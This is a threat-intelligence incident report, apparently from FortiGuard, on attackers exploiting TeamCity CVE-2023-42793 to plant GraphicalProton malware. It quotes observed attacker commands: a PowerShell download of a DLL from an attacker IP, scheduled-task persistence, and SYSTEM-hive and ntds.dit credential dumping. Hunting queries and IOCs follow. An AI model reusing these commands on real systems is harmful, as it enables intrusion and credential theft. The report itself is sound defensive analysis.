Affected Platforms: Machines running vulnerable JetBrains TeamCity versions (before 2023.05.4, per vendor advice)
Threat Type: Remote Code Execution Vulnerability
Impact: Remote code execution for unauthenticated users, enabling initial access to vulnerable servers
Security Level: High

Cyber Kill Chain®

Introduction

On September 6, 2023, researchers from Sonar discovered a critical TeamCity On-Premises vulnerability (CVE-2023-42793[1]) issue.[2] TeamCity is a build management and continuous integration server from JetBrains[3]. On September 27, 2023, a public exploit for this vulnerability was released by Rapid7[4]. This critical vulnerability was given a CVE score of 9.8, most likely because an attacker can deploy the publicly available exploit without authentication supporting remote code execution on the victim server using a basic web request to any accessible web server hosting the vulnerable application. This vulnerability has been observed being actively exploited in the wild and was added to CISA's 'Known Exploited Vulnerabilities Catalog' on October 4, 2023.[5]

In mid-October 2023, the FortiGuard Incident Response (IR) team sent a courtesy notification to an organization that had been compromised due to this vulnerability.  This organization engaged the FortiGuard IR team to investigate the malicious activity in their network.

The victim was a US-based organization in the biomedical manufacturing industry. Our subsequent investigation determined that initial access for the attack was through the exploitation of the CVE-2023-42793 TeamCity vulnerability using a custom-built exploit script written in Python. The behavior of the malware used in post-exploitation matches the GraphicalProton malware used by APT29. This article breaks down our investigation and the outcome of our containment, eradication, and remediation efforts. As part of this analysis, we look at threat actor TTPs employed throughout the intrusion and how they were identified and pieced together by the FortiGuard IR team. MITRE ATT&CK mapping and observables are provided at the end of the article, alongside IOCs and FortiEDR Threat Hunting queries, to assist with threat-hunting activities for similar behavior.

Summary of Attack

Figure 1: The attack timeline of TeamCity intrusion described in this article.

Analysis

Vulnerability Exploitation

As part of our initial customer engagement, we examined several EDR events reported from one of the victim's Windows application servers (HOST_1_TEAMCITY). During a scoping call, the FortiGuard IR team identified that one of the applications hosted on this server was TeamCity. The victim had only recently updated the application to a non-vulnerable version.

We began by retrieving application and system logs from the suspected compromised server (HOST_1_TEAMCITY). On analysis of the application logs, we identified significant evidence of successful exploitation of the TeamCity vulnerability. The authentication bypass can be observed in the screenshot of the teamcity-auth.log file, shown in Figure 2.

Figure 2: A snippet of the 'teamcity-auth.log' screenshot highlighting the TeamCity exploit evidence and associated remote IP.

Figure 3: A snippet of the 'teamcity-server.log' showing remote code execution evidence, including the associated command executed through the exploitation.

Further analysis of the various commands executed on the vulnerable server through this RCE exploit led the IR team to believe multiple threat actors were conducting simultaneous operations. Some commands executed as part of this intrusion are shown in Table 1.

Table 1. Commands executed by multiple threat actors on the TeamCity software host HOST_1_TEAMCITY.

Figure 4: TeamCity log showing attempted Linux command execution by a threat actor following successful vulnerability exploitation.

It appears that several of the commands from various remote IPs may have been associated with the use of the open-source vulnerability scanner Nuclei[6]. The IR team found a Nuclei template (CVE-2023-42793.yaml) designed to identify the presence of the TeamCity vulnerability in Nuclei's official template repository[7]. The yaml template file contains the following line:

POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1

The resulting request would produce an echo command on a successfully exploited TeamCity server, identical to the echo commands observed in the victims' TeamCity logs. The IR team collated information from both logs to better understand the correlations between when the echo commands were executed and the associated network connections from the numerous public IP addresses. A snippet of this correlation is shown in Figure 5, where the echo commands generated by some of the Nuclei scanning are also highlighted.

Figure 5: A snippet of correlated logs showing network connections and subsequent commands. Highlighted are multiple echo commands indicative of likely Nuclei scanning.

At this stage of the intrusion, it became clear that multiple threat actors were scanning for the vulnerability, validating if it could be exploited, and attempting to establish a foothold using the related exploitation. The following section of this report focuses on the activities of one of these threat actors distinct from other threat actor activities. We will refer to this culprit as the 'main threat actor.' A description of the activities conducted by other threat actors exploiting this vulnerability is covered more extensively in the following 'Other Threat Actors Activity' section.

Main Threat Actor Intrusion

The first activity attributed to the main threat actor was the execution of an echo command like those discussed above, indicating that the main threat actor likely employed Nuclei to identify potential victims. After this initial command, the main threat actor began executing additional discovery commands to gather system and privilege information. Some of these discovery commands are shown below:

cmd.exe "/c systeminfo"
whoami
ipconfig /all
whoami /all

The command attributed to the Nuclei scanning, as well as these subsequent discovery commands, were linked to different remote IP addresses. However, we assessed them as being from the same actor due to the slight timeline difference of a few seconds between the activities. This indicates the main threat actor uses different infrastructures to scan for victims and execute later commands.

One command and control (C2) IP address discovered during our investigation was linked to a US-based tertiary education organization. Upon detection of this active exploitation, the FortiGuard IR team notified the organization that their infrastructure may have been compromised and part of an ongoing APT29 campaign. They performed an internal investigation and identified exploitation of their vulnerable TeamCity server associated with the previously identified IP address. As part of this exploitation, the main threat actor used the TeamCity exploit to install an SSH certificate, which they then used to maintain access in this second victim's environment. The organization's security team provided additional information to the FortiGuard IR team, who then identified that the source of the attack on the educational organization was a TOR exit node. This report does not include the victim’s details used as a relay to protect their identity. They have successfully remediated their environment and patched the associated vulnerability.

 After executing the discovery commands outlined above, the main threat actor attempted to download a DLL file, 'AclNumsInvertHost.dll,' on the TeamCity host using PowerShell and the 'Invoke-WebRequest' cmdlet. The actor used the following command to download the file:

powershell -exec bypass -c "Invoke-WebRequest -Uri
hxxp[:]//103[.]76[.]128[.]34:8080/AclNumsInvertHost.dll -OutFile
C:\Windows\System32\AclNumsInvertHost.dll"

After successfully downloading this DLL file on the HOST_1_TEAMCITY, the main threat actor again used the TeamCity RCE vulnerability to create a Windows-scheduled task referencing this DLL file. They likely did this for persistence and to abstract their execution from the TeamCity exploitation. The actor used the following command to create the scheduled task:

schtasks.exe /create /SC ONLOGON /tn
"\Microsoft\Windows\DefenderUPDService" /tr
"\"C:\Windows\system32\rundll32.exe\"
\"C:\Windows\system32\AclNumsInvertHost.dll\",AclNumsInvertHost"

We recovered the associated Windows task file from the victim TeamCity server (HOST_1_TEAMCITY), confirming that the command in the TeamCity log had been successfully executed and the scheduled task was created. The retrieved Windows task data is shown in Figure 6:

Figure 6: Windows task created by threat actor for the persistence of a DLL file.

After successfully creating the scheduled task, the actor attempted to execute the newly created task using the following command, again executed through the TeamCity RCE vulnerability on the HOST_1_TEAMCITY:

schtasks.exe /run /tn "\Microsoft\Windows\DefenderUPDService"

Analyzing the scheduled task and its method of creation, we noticed two main indicators of interest: the URL 'hxxp[:]//103[.]76[.]128[.]34:8080/AclNumsInvertHost.dll' and the file 'AclNumsInvertHost.dll.' We then analyzed the URL referenced for downloading this payload. At the time of the incident, there was limited open-source information on the IP contained in the URL or associated URLs. However, the certificate used on the webserver hosted at this IP was of interest. The certificate is expired with the common name '*.ultasrv[.]com'. This common name does not appear to be associated with a legitimate organization[8]. The entity associated with ultasrv[.]com seems to be a VPS (Virtual Private Server) provider. Looking more closely at the webserver itself, we identified that it had an accessible open directory service. We then used this access to identify additional payloads hosted by the associated threat actor. The files on the server can be seen in Figure 7.

Figure 7: Files from the opendir listing of the C2 server used by the threat actor associated with TeamCity exploitation.

Some information on the hosted files is provided in Table 2, along with associated file hashes.

Table 2. Descriptions of files found on the C2 server 103.76.128[.]34.

Figure 8: A snippet of code from poc.py found on the C2 web server, and a snippet of the TeamCity log showing a similar request received by the victim during exploitation.

Figure 9: FortiGuard CTS information on the IP associated with the main threat actor TeamCity exploitation in the victim environment.

Figure 10: Encrypted code section of the AclNumsInvertHost.dll executed as part of the main threat actor's scheduled task persistence.

Figure 11: Yara rule for GraphicalProton matched against multiple DLL files found on the main threat actor opendir server.

The files in Figure 11 also matched the Yara rule M_Dropper_BURNTBATTER_1, which searches for the custom chaskey implementation. This Yara rule was from the article, 'Backchannel Diplomacy: APT29's Rapidly Evolving Diplomatic Phishing Operations,' by Mandiant[9].

GraphicalProton is a malware historically employed by group APT29. While this tooling is confidently linked to APT29 (Mandiant) or BlueBravo (Recorded Future), the victimology and initial access vector employed by the main threat actor throughout earlier stages of this intrusion does not align with currently reported APT29 campaigns. However, a previous well-known attack from APT29 targeted the company Solarwinds, using the same build of the TeamCity management tool[10]. While the IR team could not attribute this activity to APT29 with high confidence, associated threat intelligence was used to focus our investigation further.[11]

At this stage of the intrusion, FortiEDR detected and blocked this scheduled task from executing due to its suspicious use of rundll32.exe and a machine learning assessment of the previously unobserved DLL 'AclNumsInvertHost.dll.' This forced the main threat actor to attempt alternative methods of execution.

The first alternative method was to use the TeamCity exploit on HOST_1_TEAMCITY to download the 'iisexpresstray.exe' and 'mscoree.dll' files from the same C2 through PowerShell. These two files were written to the directory' C:\Windows\WinStore\'. The 'iisexpress.exe' file is a legitimate signed installer executable for IISExpress, a lightweight implementation of IIS provided by Microsoft[12]. However, downloaded alongside this legitimate installer was 'mscoree.dll,' a malicious DLL file with the same name as a legitimate DLL (T1036.005).[13] The combination of these two files would allow the threat actor to employ DLL search order hijacking (T1574.001)[14] to execute their malicious DLL when the legitimate IISExpress executable is executed.

To execute this side-loading attack, the main threat actor created another scheduled task using the following command executed via the TeamCity exploit:

schtasks.exe /create /SC ONSTART /tn
"\Microsoft\Windows\IISUpdateService" /tr
"C:\Windows\WinStore\iisexpresstray.exe" /RU "SYSTEM" /f

After the scheduled task was created, the threat actor executed the scheduled task using the following command:

schtasks.exe /run /tn "\Microsoft\Windows\IISUpdateService"

When the 'iisexpresstray.exe' file was executed on the HOST_1_TEAMCITY, a separate thread was created by the malicious DLL file that tried to access the system credentials through lsass.exe. This attempt was also blocked by FortiEDR. This is shown in the event graph in Figure 12.

Figure 12: FortiEDR blocked access to lsass.exe from iisexpresstray.exe.

The main threat actor had used multiple legitimate software in this attack. The list of legitimate files is shown in the table below. Some of the executables listed in Table 3 were recovered from the opendir[15] web server.

Table 3. List of legitimate software executables observed in the attack and on the C2 server, which are used to load malicious DLL files.

Figure 13: Attempt to dump system credentials using reg.exe was blocked by FortiEDR.

These attempts represent only two of the many credential dumping techniques the threat actor attempted to employ within the victim environment. Fortunately, the FortiEDR software installed on the majority of their endpoints, including the victim server, blocked these techniques. The associated EDR security events also generated multiple alerts. Unfortunately, the targeted organization made numerous broad exceptions for this malicious behavior. This was likely due to the behavior originating from the TeamCity application, so they were incorrectly assessed as a false positive. These exceptions are outlined below:

1. allow rundll32.exe to run AclNumsInverHost.dll when rundll32.exe is executed by cmd.exe.
2. allow reg.exe to run as a hidden process
3. allow reg.exe to access critical system information (credential dumping)
4. allow natid.sys to be loaded (a suspicious driver dropped by the threat actor)
5. allow rundll32.exe to execute AclNumsInvertHost.dll and create a thread in any lsass.exe process
6. allow rundll32.exe to execute AclNumsInvertHost.dll and create a thread in any svchost.exe process
7. allow any execution of PowerShell and associated rule violations

These exceptions removed the constraints around the adversary's ability to fully employ their TeamCity exploitation, allowing the main threat actor to continue their execution unrestricted by FortiEDR.

After these exceptions were set, the main threat actor was able to successfully dump the registry of the Windows host HOST_1_TEAMCITY to gain access to local user credentials (T1003.002)[16]. To achieve this, the threat actor used reg.exe to dump the SYSTEM registry hive (T1003.002[17]) using the command below:

reg.exe save HKLM\SYSTEM “C:\Windows\temp\1\sy.sa” /y

This can be seen in the FortiEDR Threat Hunting event shown in Figure 14.

Figure 14: FortiEDR Threat Hunting event associated with the reg.exe process being used to dump the SYSTEM registry hive.

Figure 15: Extract from the TeamCity application logs showing the commands used to create a new local Windows user on the victim endpoint.

At this time, the host HOST_1_TEAMCITY was patched for CVE-2023-42793. The IR team verified the patch was successful and that there was no further exploitation of this vulnerability on this host following the installation of the patch. Unfortunately, the threat actor had already created alternative access through their GraphicalProton implant and had already begun laterally moving to other hosts within the victim network through SMB, RDP, and remote WMIC commands.

The hosts HOST_3_SVR and HOST_4_SVR were targeted using WMIC commands (T1047)[19] from the original compromised host, HOST_1_TEAMCITY. The network connections linked to this behavior were established using explicit credentials. This indicates that the main threat actor had successfully pulled credentials prior to this activity. The IR team thinks this WMIC activity was likely conducted to execute a GraphicalProton DLL through either rundll32 proxy execution like that demonstrated in the previously discussed scheduled task or through search order hijacking using one of the binary and DLL pairs pulled from the main threat actor C2 opendir web server. You can see evidence of the network connection associated with this WMIC activity from the Windows event log in Figure 16.

Figure 16: Windows log screenshot showing WMIC.exe execution remotely from HOST_1_TEAMCITY to HOST_4_SVR

On the HOST_2_SVR, the main threat actor employed a different lateral movement technique by establishing an RDP connection from the HOST_1_TEAMCITY. This connection was used to create multiple suspicious files in the 'C:\Windows\SchCache’ directory on HOST_2_SVR. Two DLL files (‘oleacc.dll’ and ‘oleac.dll’) and one executable file (‘FlashUtil_ActiveX.exe’) were created in this directory. When the IR team ran a Yara scan against these files, the DLL file oleac.dll matched the Yara rule for GraphicalProton. The remaining files, oleacc.dll and FlashUtil_ActiveX.exe, were determined to be non-malicious Microsoft-signed files.

The main threat actor then created persistence for this file through a scheduled task. This time, the task was named 'WindowsActiveX' and was created to execute the 'C:\Windows\SchCache\FlashUtil_ActiveX.exe' file when Windows starts. This shows the use of another legitimate executable to perform search order hijacking to load a malicious GraphicalProton DLL. The command used to create this scheduled task can be observed in the FortiEDR Threat Hunting event, shown in Figure 17.

Figure 17: FortiEDR Threat Hunting event showing the creation of a scheduled task for FlashUtil_ActiveX.exe

In another credential dumping attempt, the main threat actor tried to dump active directory credentials using the Windows utility ‘ntdsutil.exe’ on the host HOST_2_SVR. They tried to dump credentials using the following command:

ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\tempp' q q

This command aims to dump the ntds.dit file, the SYSTEM registry hive, and the SECURITY registry hives in the given path (in this case, ‘C:\tempp’). Threat actors can often dump password hashes from these files offline using tools like mimikatz.[20] FortiEDR blocked this activity, and the associated security event can be observed in Figure 18.

Figure 18: Execution of ntdsutil.exe to dump ntds.dit file was blocked by FortiEDR.

In addition to this scheduled task, the IR team found another GraphicalProton DLL in the ‘C:\Program Files\Windows Defender’ directory. This directory contained an executable PE file, ‘MpCmdRun.exe,’ and DLL files, ‘MpCmdHelp.dll’ and ‘MpClient.dll.’ One of the files (MpCmdHelp.dll) matched against the Yara rule for malware GraphicalProton, and the second DLL file, MpClient.dll, is a legitimate library used by ‘MpCmdRun.exe.’ Like the ‘FlashUtil_ActiveX.exe’ example discussed earlier in this report, the ‘MpCmdRun.exe’ is a legitimate binary vulnerable to search order hijacking. The ‘MpCmdRun.exe’ binary is an official command-line tool used to perform various operations related to Microsoft Defender Antivirus. The default path of this binary is ‘C:\Program Files\Windows Defender.’

At this investigation stage, the team performed large-scale Yara scanning to identify additional potentially compromised hosts. This scanning identified DLL files matching the GraphicalProton signature written to disk on the hosts HOST_6_SQL and HOST_7_SVR. On both hosts, a task named ‘WindowsDefenderService’ that executed the GraphicalProton DLLs was created, matching the tradecraft of the previously discussed scheduled tasks. One of the scheduled task files associated with these tasks can be seen in Figure 19.

Figure 19: Schedule task file for proxy execution of the malicious GraphicalProton DLL file identified on HOST_6_SQL.

The IR team also found a network login to HOST_5_SVR from the primary infected HOST_1_TEAMCITY host.

Shortly after this login event, an instance of rundll32 used for proxy execution of another GraphicalProton sample was started. However, the process crashed. This resulted in a memory dump of the rundll32.exe process. The IR team performed strings analysis of the memory dump and found URLs of graph.microsoft[.]com and 1drv[.]ms, which are legitimate domains related to Microsoft OneDrive operations. The IR team also found an email address (quentparoty[@]outlook.com) in the memory dump, although this indicator has not been linked to any known IOCs. However, it has been included for completeness. Significant strings extracted from the memory dump can be seen in Figure 20.

Figure 20: Strings from memory analysis of crash dump showing email address and URL of OneDrive.

Similar network indicators were identified when we executed the AclNumsInvertHost.dll file using rundll32.exe in a virtual analysis environment. The IR team also observed connections to api.dropboxapi[.]com from the rundll32.exe in the Threat Hunting data of the victim environment. The GraphicalProton report[21] from Insikt Group from Recorded Future showed that researchers had previously observed GraphicalProton samples employ Microsoft OneDrive and Dropbox as part of their C2.

The malicious DLL samples were shared with analysts from the FortiGuard Forensics Team for further malware analysis. They confirmed that the behavior of the multiple malicious DLL matches GraphicalProton malware behavior. The malicious DLL was communicating with Microsoft OneDrive, and the following information was obtained in JSON format from this communication.

The analyst team also observed numerous anti-debugging techniques in malicious DLL files, such as a call to NtQueryObject to look for the “DebugObject” variable. It also has strings such as “Ollydbg,” probably to check if the Ollydbg.exe process is running. If the process is found running, the malware may then terminate itself.

Given our understanding of the main threat actor’s operations, we determined that persistence was still possible. The IR team provided recommendations on removing existing adversary accesses and persistence. A high-level view of the containment and eradication actions recommended are provided below:

1. Blocking the IP addresses used by threat actors
2. Removing TeamCity software accounts created by threat actors
3. Removing Windows accounts created by threat actors
4. Removing backdoors created by threat actors
5. Removing malicious files dropped by threat actors

After implementing these containment and remediation actions by the victim security team, no further malicious activity has been observed.

Other Threat Actor Activity

In addition to the main threat actor, there were other threat actors who exploited the TeamCity vulnerability. One of these threat actors used their RCE access through the exploit to create a new TeamCity user via the TeamCity API. They then added the ‘System administrator’ role to this newly created user account. No evidence was found to indicate that this newly created account was ever used once it was created. Logs related to this activity were recorded in the teamcity-server.log and can be seen in Figure 21.

Figure 21: TeamCity log showing the creation of a new user and assigning an admin role to the user.

Figure 22: TeamCity log showing download and execution of 1.exe by the threat actor.

Figure 23: The TeamCity log showing the installation and execution of the Anydesk remote access tool.

Figure 24: Fortiguard CTS screen with information about AnyDesk relay IP address.

Figure 25: An Anydesk.exe TCP/IP connection from host HOST_1_TEAMCITY to the internet.

These actors tried one or two methods but did not conduct further activity on the server or victim network. They likely lacked the knowledge or interest to pursue further intrusion on the victim network, as their initial efforts were ineffective.

Conclusion

This article provided details of several intrusions where the TeamCity vulnerability CVE-2023-42793 was exploited to gain access to the victim network. Observed exploitation originated from multiple disparate threat actors who employed numerous diverse post-exploitation techniques in an attempt to gain a foothold in the victim network. It should be noted that this activity occurred after the vendor (JetBrains) had provided a valid patch.

While the security controls in place within the victim's environment were able to keep the majority of adversaries at bay, a failure to adequately triage alerts generated by the victim's EDR (FortiEDR) and subsequent downgrading of protections opened gaps in the victim's defenses. This allowed the main threat actor to establish a foothold and eventually gain the access required to maneuver freely through the network.

As part of this intrusion, the main threat actor employed the GraphicalProton malware to maintain access. The main threat actor primarily used Scheduled Tasks (T1053.005[23]) to execute these GraphicalProton payloads. Their preferred method of defense evasion for these scheduled tasks was rundll32 proxy execution, but the threat actor was also able to employ several legitimate third-party binaries that were vulnerable to search order hijacking to execute their malware. Given the technique crossover with previously reported activity and the identification of the GraphicalProton payload, FortiGuard believes with medium confidence that this attack was part of a new BlueBravo (tracked by Recorded Future[24])/APT29 (tracked by Mandiant[25]) campaign. Of particular note are the significant OPSEC considerations employed throughout the intrusion (discounting the opendir web server fumble): the use of compromised infrastructure local to the victim, search order hijacking with legitimate DLLs added after execution, the quality of masquerading, and the use of single-use infrastructure components.

MITRE ATT&CK mappings, mitigation suggestions, and threat-hunting queries are provided below to assist organizations in identifying similar activity in their environments. IOCs have also been provided for completeness.

Fortinet Protections

The malware described in this report are detected and blocked by FortiGuard Antivirus as:

AntiVirus: W64/GraphicalProton.A!tr
AntiVirus: W64/Dukes.O!tr
AntiVirus: W32/Dukes.P!tr
AntiVirus: W32/PossibleThreat

FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.

Fortinet has also released an IPS signature to proactively protect our customers from the threats contained in the report:

CVE-2023-42793: JetBrains.TeamCity.CVE-2023-42793.Authentication.Bypass

The URLs are rated as “Malicious Websites” and “Malicious Activities Found” by the FortiGuard Web Filtering service.

FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

Threat Hunting

The following Threat Hunting query will search for a network socket connected by rundll32.exe, which has the same filenames of DLL as those observed in this intrusion.

Type: ("Socket Connect") AND Source.Process.Name: ("rundll32.exe") AND Source.Process.CommandLine: ("\"AclNumsInvertHost.dll\", AclNumsInvertHost" OR "\"UnregisterAncestorAppendAuto.dll\", UnregisterAncestorAppendAuto")

The following Threat Hunting query will search for process creation events where rundll32.exe launches cmd.exe and executes any of the commands executed by the malicious DLL upon execution.

Type: ("Process Creation") AND Source.Process.Name: ("rundll32.exe") AND Target.Process.File.Name: ("cmd.exe") AND Target.Process.CommandLine: ("\/C \"chcp 65001 \> NUL & netstat \-afn \-p TCP\"" OR "\/C \"chcp 65001 \> NUL & wmic datafile where Name\=\"C\:\\\\Windows\\\\system32\\\\ntoskrnl.exe\" get Version\"" OR "\/C \"chcp 65001 \> NUL & echo %userdomain%\*%computername%\*\*%username%\"" OR "\/C \"chcp 65001 \> NUL & tasklist\"")

The following Threat Hunting query will search for process creation of scheduled tasks using schtasks.exe with type ONLOGON or ONSTART and with the following filenames (iisexpresstray.exe, AclNumsInvertHost.dll, UnregisterAncestorAppendAuto.dll), which were used throughout this intrusion for persistence.

Type: ("Process Creation") AND Target.Process.File.Name: ("schtasks.exe") AND Target.Process.CommandLine: (create \/SC AND (ONLOGON OR ONSTART)) AND Target.Process.CommandLine:(iisexpresstray.exe OR AclNumsInvertHost.dll OR UnregisterAncestorAppendAuto.dll OR DefenderUPDService OR IISUpdateService)

The following Threat Hunting query will search for an event where a particular task creation was being verified by the threat actor.

Type: ("Process Creation") AND Target.Process.File.Name: ("schtasks.exe") AND Target.Process.CommandLine: ("\/Query \/TN \\Microsoft\\Windows\\DefenderUPDService \/FO LIST \/V")

The following Threat Hunting query will search for an event where TeamCity process (java.exe) creates a process of Windows task management utility (schtasks.exe). Keep in mind that this query might have false positives where there is an official need for Java applications to launch the schedule task utility.

Type: ("Process Creation") AND Source.Process.Name: ("java.exe") AND Target.Process.File.Name: ("schtasks.exe")

The following Threat Hunting query will search for an event where schtasks.exe is the target process and the command line contains rundll32.exe. Keep in mind this query might generate false positives in envrionments where there are scheduled tasks having rundll32.exe are created using schtasks.exe.

Type: ("Process Creation") AND target.Process.Name: ("schtasks.exe") AND Target.Process.CommandLine: (rundll32.exe)

The following Threat Hunting query will search for an event where rundll32.exe will connect to login.microsoftonline[.]com or graph.microsoft[.]com over HTTP protocol. Keep in mind that this query might generate false positives where there is a legitimate use of rundll32.exe to connect to these URLs.

Type: ("HTTP Request") AND Source.Process.Name: ("rundll32.exe") AND URL: ("https\:\/\/login.microsoftonline.com\:443" OR "https\:\/\/graph.microsoft.com\:443")

MITRE ATT&CK

TA0042: Resource Development

TA0043: Reconnaissance

TA0001: Initial Access

TA0002: Execution

TA0003: Persistence

TA0005: Defense Evasion

TA0006: Credential Access

TA0011: Command & Control

IOCs

The following IOCs are from the investigation, analysis of the samples, and subsequent activity observed on the same host between initial detection and remediation by the customer. In addition to these IOCs directly observed by the FortiGuard IR team, several samples that match the characteristics of observed samples have been included to assist with detecting historical activity.

Article References

[1] https://nvd.nist.gov/vuln/detail/CVE-2023-42793

[2] https://www.sonarsource.com/blog/teamcity-vulnerability/

[3] https://www.jetbrains.com/teamcity/

[4] https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis

[5] https://www.cisa.gov/news-events/alerts/2023/10/04/cisa-adds-two-known-exploited-vulnerabilities-catalog-removes-five-kevs

[6] https://github.com/projectdiscovery/nuclei

[7] https://github.com/projectdiscovery/nuclei-templates/blob/016d696c4c964f47580f21a1219f6c878264a7a0/http/cves/2023/CVE-2023-42793.yaml#L52C34-L52C34

[8] https://crt.sh/?q=d88fbe100874149e0059203fc1873958cde569deae66e1d934083006a4d5a258

[9] https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

[10] https://www.wired.com/story/the-untold-story-of-solarwinds-the-boldest-supply-chain-hack-ever/

[11] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf

[12] https://learn.microsoft.com/en-us/iis/extensions/introduction-to-iis-express/iis-express-overview

[13] https://attack.mitre.org/techniques/T1036/005/

[14] https://attack.mitre.org/techniques/T1574/001/

[15] https://pubs.opengroup.org/onlinepubs/009604599/functions/opendir.html

[16] https://attack.mitre.org/techniques/T1003/002/

[17] https://attack.mitre.org/techniques/T1003/002/

[18] https://attack.mitre.org/techniques/T1136/001/

[19] https://attack.mitre.org/techniques/T1047/

[20] https://github.com/ParrotSec/mimikatz

[21] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf

[22] https://attack.mitre.org/techniques/T1219

[23] https://attack.mitre.org/techniques/T1053/005

[24] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf

[25] https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

[26] https://community.fortinet.com/t5/FortiGate/Technical-Tip-Blocking-and-monitoring-Tor-traffic/ta-p/196239